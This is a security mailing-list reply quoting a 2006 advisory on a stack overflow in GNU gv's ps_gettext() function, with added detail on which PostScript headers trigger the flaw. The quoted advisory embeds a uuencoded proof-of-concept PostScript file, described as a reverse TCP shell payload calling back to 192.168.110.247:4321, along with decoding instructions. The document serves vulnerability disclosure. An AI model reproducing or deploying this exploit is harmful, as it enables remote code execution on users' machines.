Re: GNU gv Stack Overflow Vulnerability

[Noam Rathaus <noamr () beyondsecurity com>]

Hi,

Apparently that is not the only parameter to be vulnerable, any parameter that 
uses the ps_gettext function is vulnerable, this is a list:
1) DocumentMedia (confirmed vuln)
2) DocumentPaperSizes (confirmed vuln)
3) PageMedia (unconfirmed)
4) PaperSize (unconfirmed)

On Thursday 09 November 2006 17:55, Renaud Lifchitz wrote:
> GNU gv Stack Overflow Vulnerability
>
>
> //----- Advisory
>
>
> Program          : GNU gv
> Homepage         : http://www.gnu.org/software/gv/
> Tested version   : 3.6.2
> Found by         : r.lifchitz at sysdream dot com
> This advisory    : r.lifchitz at sysdream dot com
> Discovery date   : 2006/11/06
> Vendor notified  : 2006/11/09
>
>
> //----- Application description
>
>
> gv is a comfortable viewer of PostScript and PDF files for the X
> Window System. It uses the ghostscript PostScript interpreter
> and is based on the classic X front-end for gs, ghostview, which
> it has replaced now.
>
>
> //----- Description of vulnerability
>
>
> The 'gv' viewer is prone to a remote stack overflow
> vulnerability. This issue exists because the application fails
> to perform proper boundary checks before copying user-supplied
> data into process buffers. A remote attacker may execute arbitrary
> code in the context of a user running the application. As a result,
> the attacker can gain unauthorized access to the vulnerable computer.
>
> This issue is present itself in the 'ps_gettext()' function residing
> in the 'ps.c' file.
>
> Long comments in some specific headers (such as '%%DocumentMedia:')
> of PS files are unconditionally copied into 'text', a 257 character
> buffer on the stack.
>
> This issue is reported to affect gv 3.6.2, but earlier versions are
> likely prone to this vulnerability as well. Applications using embedded
> gv code may also be vulnerable.
>
>
> //----- Proof Of Concept
>
>
> * Linux IA32 Reverse TCP Shell on 192.168.110.247:4321 (uuencoded
> exploit) :
>
> begin 644 hello-reverseshell.ps
> M)2%04RU!9&]B92TS+C`*)254:71L93H@:&5L;&\N<',*)25&;W(Z(%)E;F%U
> M9"!,:69C:&ET>B`M(%-Y<V1R96%M("T@:'1T<#HO+W=W=RYS>7-D<F5A;2YC
> M;VTO"B4E0F]U;F1I;F=";W@Z(#(T(#(T(#4X."`W-C@*)25$;V-U;65N=$UE
> M9&EA.B"0D)"0D)"0D#')@^GNV>[9="3T6X%S$](GKN*#Z_SB]./\_:&!3:R(
> MM'\G`Q^G/;MB&&-BFUY7N8A/;DJ\T,B*PL;MA(&N3U*T=_^Q6\;M+U)UQLW]
> M5,:*_47'C%O$_+%;QA[I'Z>NXD%!04%!04%!04%!04%!04%!04%!04%!04%!
> M04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!
> M04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!
> M04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!
> M04%!04%!04'OO`0(04%!(#8Q,B`W.3(@,"`H*2`H*0HE)41O8W5M96YT1&%T
> M83H@0VQE86XW0FET"B4E3W)I96YT871I;VXZ($QA;F1S8V%P90HE)5!A9V5S
> M.B`Q"B4E4&%G94]R9&5R.B!!<V-E;F0*)24K(&5N8V]D:6YG($E33RTX.#4Y
> 9+3%%;F-O9&EN9PHE)45N9$-O;6UE;G1S"@``
> `
> end
>
>
> Use:
> $ uudecode < this-advisory.txt
> to extract the exploit.
>
>
> //----- Solution
>
>
> No known solution. You have to wait for a vendor upgrade and
> be careful with unknown PS files.
>
>
> //----- Impact
>
>
> Successful exploitation leads to remote code execution.
>
>
> //----- Credits
>
>
> Renaud Lifchitz
> r.lifchitz at sysdream dot com
> http://www.sysdream.com/
>
>
> //----- Greetings
>
>
> Thanks to Ali Rahbar

-- 
  Noam Rathaus
  CTO
  1616 Anderson Rd.
  McLean, VA 22102
  Tel: 703.286.7725 extension 105
  Fax: 888.667.7740
  noamr () beyondsecurity com
  http://www.beyondsecurity.com